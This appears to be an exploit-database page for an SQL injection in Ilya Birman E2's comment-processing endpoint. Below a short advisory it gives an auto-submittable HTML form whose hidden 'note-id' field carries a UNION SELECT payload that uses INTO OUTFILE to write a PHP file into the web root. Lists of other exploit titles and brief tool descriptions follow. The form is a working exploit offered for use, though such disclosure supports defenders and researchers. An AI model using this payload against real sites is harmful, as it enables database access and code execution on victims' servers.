Menu

Search for hundreds of thousands of exploits

"Ilya Birman E2 - '/@actions/comment-process' SQL Injection"

Author

Exploit author

"High-Tech Bridge"

Platform

Exploit platform

php

Release date

Exploit published date

2014-07-23

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
source: https://www.securityfocus.com/bid/68843/info

Ilya Birman E2 is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input.

An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

E2 v2844 is vulnerable; other versions may also be affected. 

<form action="http://www.example.com/@actions/comment-process" method="post" name="main">
<input type="hidden" name="already-subscribed" value="">
<input type="hidden" name="comment-id" value="new">
<input type="hidden" name="elton-john" value="1">
<input type="hidden" name="email" value="mail@mail.com">
<input type="hidden" name="from" value="">
<input type="hidden" name="name" value="name">
<input type="hidden" name="subscribe" value="on">
<input type="hidden" name="text" value="1">
<input type="hidden" name="note-id" value="' UNION SELECT '<? phpinfo(); ?>',2,3,4,5,1,7,8,9,10,11,12,13,14,15 INTO OUTFILE '/var/www/file.php' -- 2">
<input type="submit" id="btn">
</form>
Release Date Title Type Platform Author
2020-12-02 "Bakeshop Online Ordering System 1.0 - 'Owner' Persistent Cross-site scripting" webapps multiple "Parshwa Bhavsar"
2020-12-02 "Pharmacy Store Management System 1.0 - 'id' SQL Injection" webapps php "Aydın Baran Ertemir"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "ILIAS Learning Management System 4.3 - SSRF" webapps multiple Dot
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "Expense Management System - 'description' Stored Cross Site Scripting" webapps multiple "Nikhil Kumar"
Release Date Title Type Platform Author
2020-12-02 "Simple College Website 1.0 - 'page' Local File Inclusion" webapps php Mosaaed
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - Password Reset leading to Account Takeover" webapps php "Mufaddal Masalawala"
2020-12-02 "WonderCMS 3.1.3 - 'Menu' Persistent Cross-Site Scripting" webapps php "Hemant Patidar"
2020-12-02 "Car Rental Management System 1.0 - SQL Injection / Local File include" webapps php Mosaaed
2020-12-02 "WordPress Plugin Wp-FileManager 6.8 - RCE" webapps php "Mansoor R"
2020-12-02 "WonderCMS 3.1.3 - Authenticated SSRF to Remote Remote Code Execution" webapps php zetc0de
2020-12-02 "WonderCMS 3.1.3 - Authenticated Remote Code Execution" webapps php zetc0de
2020-12-02 "Pharmacy Store Management System 1.0 - 'id' SQL Injection" webapps php "Aydın Baran Ertemir"
2020-12-01 "LEPTON CMS 4.7.0 - 'URL' Persistent Cross-Site Scripting" webapps php "Sagar Banwa"
Release Date Title Type Platform Author
2014-08-20 "ArticleFR - 'id' SQL Injection" webapps php "High-Tech Bridge"
2014-07-23 "Ilya Birman E2 - '/@actions/comment-process' SQL Injection" webapps php "High-Tech Bridge"
2014-05-08 "TOA - Cross-Site Request Forgery" webapps php "High-Tech Bridge"
2014-03-24 "Symphony 2.2.4 - Cross-Site Request Forgery" webapps php "High-Tech Bridge"
2014-01-28 "Eventum 2.3.4 - 'hostname' Remote Code Execution" webapps php "High-Tech Bridge"
2014-01-27 "Eventum - Insecure File Permissions" webapps php "High-Tech Bridge"
2014-01-16 "Joomla! Component Sexy polling 1.0.8 - 'answer_id' SQL Injection" webapps php "High-Tech Bridge"
2013-12-11 "eduTrac - 'showmask' Directory Traversal" webapps php "High-Tech Bridge"
2013-08-21 "Twilight CMS - DeWeS Web Server Directory Traversal" webapps php "High-Tech Bridge"
2013-07-31 "Jahia xCM - '/administration/' Multiple Cross-Site Scripting Vulnerabilities" webapps php "High-Tech Bridge"
2013-07-31 "Jahia xCM - '/engines/manager.jsp?site' Cross-Site Scripting" webapps php "High-Tech Bridge"
2013-07-24 "Magnolia CMS - Multiple Cross-Site Scripting Vulnerabilities" webapps php "High-Tech Bridge"
2013-07-24 "WordPress Plugin Duplicator - Cross-Site Scripting" webapps php "High-Tech Bridge"
2013-06-26 "Xaraya - Multiple Cross-Site Scripting Vulnerabilities" webapps php "High-Tech Bridge"
2013-04-10 "Hero Framework - '/users/login?Username' Cross-Site Scripting" webapps java "High-Tech Bridge"
2013-04-10 "Hero Framework - '/users/forgot_password?error' Cross-Site Scripting" webapps java "High-Tech Bridge"
2013-04-03 "Symphony - 'sort' SQL Injection" webapps php "High-Tech Bridge"
2013-04-03 "FUDforum - Multiple Remote PHP Code Injection Vulnerabilities" webapps php "High-Tech Bridge"
2013-02-27 "Geeklog - Cross-Site Scripting" webapps php "High-Tech Bridge"
2013-02-06 "WordPress Plugin Wysija Newsletters - Multiple SQL Injections" webapps php "High-Tech Bridge"
2013-02-06 "WordPress Plugin CommentLuv - '_ajax_nonce' Cross-Site Scripting" webapps php "High-Tech Bridge"
2013-01-31 "Novell Groupwise Client 8.0 - Multiple Remote Code Execution Vulnerabilities" remote multiple "High-Tech Bridge"
2013-01-09 "Samsung Kies - Remote Buffer Overflow" remote windows "High-Tech Bridge"
2013-01-09 "Quick.CMS / Quick.Cart - Cross-Site Scripting" webapps php "High-Tech Bridge"
2012-12-10 "Smartphone Pentest Framework - Multiple Remote Command Execution Vulnerabilities" webapps cgi "High-Tech Bridge"
2012-11-21 "dotProject 2.1.x - 'index.php' Multiple Cross-Site Scripting Vulnerabilities" webapps php "High-Tech Bridge"
2012-11-21 "dotProject 2.1.x - 'index.php' Multiple SQL Injections" webapps php "High-Tech Bridge"
2012-11-07 "OrangeHRM - 'sortField' SQL Injection" webapps php "High-Tech Bridge"
2012-10-17 "jCore - '/admin/index.php?path' Cross-Site Scripting" webapps php "High-Tech Bridge"
2012-10-10 "OpenX 2.8.10 - 'plugin-index.php' Cross-Site Scripting" webapps php "High-Tech Bridge"
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.